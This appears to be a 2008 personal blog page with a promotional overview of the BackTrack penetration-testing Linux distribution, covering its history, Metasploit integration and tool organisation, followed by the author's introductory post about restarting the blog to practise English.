It evolved from the merger of two widespread distributions, Whax and Auditor Security Collection. By joining forces and replacing those distributions, BackTrack gained massive popularity and was voted the #1 Security Live Distribution by insecure.org in 2006. Security professionals as well as newcomers all over the globe use BackTrack as their favourite toolset.

BackTrack has a long history and was based on many different Linux distributions; it is now based on Slackware Linux and the corresponding live-CD scripts by Tomas M. (www.slax.org). Every package, kernel configuration and script is optimized for use by penetration testers. Patches and automation have been added, applied or developed to provide a neat and ready-to-go environment.

After settling into a stable development process over the last releases and consolidating feedback and additions, the team focused on supporting more and newer hardware as well as providing more flexibility and modularity by restructuring the build and maintenance processes. In the current version, most applications are built as individual modules, which helps to speed up maintenance releases and fixes.

Because Metasploit is one of the key tools for most analysts, it is tightly integrated into BackTrack, and both projects collaborate to always provide a current implementation of Metasploit within the BackTrack CD-ROM images or the upcoming virtualization images (such as VMware appliances) distributed and maintained by remote-exploit.org.

Being superior while staying easy to use is key to a good security live CD. We took things a step further and aligned BackTrack with penetration testing methodologies and assessment frameworks (ISSAF and OSSTMM). This will help our professional users during their daily reporting nightmares.

Currently BackTrack consists of more than 300 different up-to-date tools, logically structured according to the workflow of security professionals. This structure allows even newcomers to find the tools related to a given task. New technologies and testing techniques are merged into BackTrack as soon as possible to keep it up to date.

No other commercial or freely available analysis platform offers an equivalent level of usability, with automatic configuration and a focus on penetration testing.

Tuesday, September 16, 2008

Intro: Although it's too late to make :)

11:56 PM Posted by viperfx07 No comments
After much consideration, I decided to continue writing my blog. Hahaha... so what?

I decided to share everything I have learned, read, and thought, even though it's not a lot.

By writing this blog, I want to improve my English writing skills, because I will need them when I go on to do my master's degree :)

So, please, enjoy yourself here. "Don't judge a book by its cover", as Tukul said...